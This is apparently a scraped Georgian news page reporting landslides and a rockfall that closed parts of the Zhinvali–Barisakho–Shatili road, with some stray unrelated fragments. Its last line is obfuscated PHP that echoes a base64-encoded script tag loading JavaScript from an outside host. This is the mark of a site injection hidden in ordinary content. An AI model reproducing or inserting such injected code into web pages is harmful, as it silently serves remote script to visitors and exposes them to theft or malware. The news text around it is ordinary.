celsiusi
ავერსი შნაიდერი
საქართველოს რეგიონული განვითარებისა და ინფრასტრუქტურის სამინისტროს საავტომობილო გზების დეპარტამენტის ინფორმაციით, შიდასახელმწიფოებრივი მნიშვნელობის ჟინვალი-ბარისახო-შატილის საავტომობილო გზის მე-20 და 22-ე კილომეტრებზე განვითარდა მეწყრული პროცესები.
 
უწყების ცნობით, აღნიშნულის გამო, გზის ხსენებულ მონაკვეთზე, მეწყერის სალიკვიდაციო ღონისძიებების გატარებამდე, აკრძალულია ყველა სახის ავტოტრანსპორტის მოძრაობა.
 
ამასთან, გუშინ, 29 ივნისს ჟინვალი-ბარისახო-შატილის საავტომობილო გზის 77-ე კილომეტრზე ჩამოიშალა კლდის მასა, რის გამოც კმ70-კმ106 მონაკვეთზე აკრძალულია ყველა სახის ავტოტრანსპორტის გადაადგილება.
506
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");